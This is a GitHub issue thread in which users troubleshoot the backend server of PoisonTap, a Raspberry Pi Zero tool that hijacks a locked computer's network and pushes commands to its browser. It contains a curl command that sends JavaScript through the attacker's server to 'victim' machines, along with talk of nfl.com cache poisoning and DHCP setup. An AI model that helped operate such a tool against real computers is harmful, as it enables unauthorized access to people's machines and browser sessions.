samyk/poisontap #49: Running backend_server.js

jelshani, 2016-11-29:
Hello,

I have set up the raspberry pi 0 and successfully tested it on windows 10. The only issue I am running into is the server itself. I am using Ubuntu 14.04 as the server. I know that backend_server.js has to be on the server but I do not know where specifically to place it. Once it is in its appropriate location do you simply run "node backend_server.js" followed by the curl commands?
Should running node backend_server.js give me a return? Currently it is not.
When I run the curl 'http://192.XXX.XXX.XXX:1337/exec?alert("muahahahaha")' I get a connection refused.

Any help would be appreciated.
Thank you!

pLesur, 2016-11-29:
I receive a "sent" response when running your command (with my domain of course). Is your nodejs returning you anything when you start it ?

jelshani, 2016-11-29:
No, nothing at all. Just a new command line.

danthegoodman1, 2016-12-02:
For the connection refused part, make sure your server is port forwarded if you are not on a LAN. I am having the issue just past this, where I get the response but nothing actually gets sent to the victim machine.

jelshani, 2016-12-02:
Everything is on the same LAN, but it seems like the backend_server.js file gives me a bunch of error messages when I try to **node backend_server.js**

var server = http.createServer((request, response) => { ^

SyntaxError: Unexpected token > at Module._compile (module.js:439:25) at Object.Module._extensions..js (module.js:474:10) at Module.load (module.js:356:32) at Function.Module._load (module.js:312:12) at Function.Module.runMain (module.js:497:10) at startup (node.js:119:16) at node.js:902:3

samyk, 2016-12-02:
@jelshani Make sure you're using node v6 (`node -v` to verify)

jelshani, 2016-12-02:
Thank you for your help!

I verified my version and successfully installed node v6, but now I ran into other errors:

node backend_server.js 
module.js:471
    throw err;
    ^

Error: Cannot find module 'websocket'
    at Function.Module._resolveFilename (module.js:469:15)
    at Function.Module._load (module.js:417:25)
    at Module.require (module.js:497:17)
    at require (internal/module.js:20:19)
    at Object.<anonymous> (/home/poisontapserver/Desktop/poisontap/backend_server.js:4:43)
    at Module._compile (module.js:570:32)
    at Object.Module._extensions..js (module.js:579:10)
    at Module.load (module.js:487:32)
    at tryModuleLoad (module.js:446:12)
    at Function.Module._load (module.js:438:3)

danthegoodman1, 2016-12-02:
@samyk  would running node 7.2.0 be ok? Or does it have to be version 6 exactly?

samyk, 2016-12-02:
@danthegoodman1 I suspect 7 would work but I have not tested myself

danthegoodman1, 2016-12-02:
@samyk Hm, I am running into something strange. When PT is plugged in, I can go to the nfl.com/PoisonTap and it loads a blank page and the websocket (does stay pending though). When I remove PT and reload it, I get a nfl.com page not found page, and no WS is called. With PT plugged in and on the nfl.com/PoisonTap commands do not push to the victim machine.

gabyavra, 2016-12-21:
I monitor the /var/log/syslog and I see the DHCPDISCOVER and also the DHCPOFFER. I also monitor the traffic using wireshark on the victim computer, and only see the DHCPDISCOVER, therefore I'm stucked with 169.254.X.X IP address. Any ideea?

gabyavra, 2016-12-21:
I monitor the /var/log/syslog and I see the DHCPDISCOVER and also the DHCPOFFER on the raspberry zero. I also monitor the traffic using wireshark on the victim computer, and only see the DHCPDISCOVER, therefore I'm stucked with 169.254.X.X IP address. Any ideea?